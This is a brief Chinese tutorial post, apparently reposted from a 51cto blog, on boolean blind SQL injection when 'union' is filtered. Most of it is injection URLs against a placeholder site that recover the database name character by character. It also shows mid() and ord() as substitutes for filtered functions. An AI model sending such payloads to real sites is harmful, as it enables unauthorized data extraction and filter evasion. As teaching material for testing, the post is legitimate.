首页 > 其他 > 详细

过滤union 进行盲注

时间:2015-01-04 19:32:23      阅读:262      评论:0      收藏:0      [点我收藏+]


http://www.x.com/sections_intr.php?id=181 and length((database()))=4


http://www.x.com/sections_intr.php?id=181 and ascii(substring((database()),1,1))=122   


http://www.x.com/sections_intr.php?id=181 and ascii(substring((database()),2,1))=122 


http://www.x.com/sections_intr.php?id=181 and ascii(substring((database()),3,1))=102 


http://www.x.com/sections_intr.php?id=181 and ascii(substring((database()),4,1))=121 


或者使用   


substring过滤的时候替换

http://www.x.com/sections_intr.php?id=181 and  ascii(mid(database(),1,1)) =122


ascii过滤的时候替换

http://www.x.com/sections_intr.php?id=181 and  ord(mid(database(),1,1))=122





122=z  102=f  121=y


库名:zzfy

ascii码表 http://app.baidu.com/app/enter?appid=218548

本文出自 “0x007” 博客,请务必保留此出处http://0x007.blog.51cto.com/6330498/1599005

过滤union 进行盲注

原文:http://0x007.blog.51cto.com/6330498/1599005

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!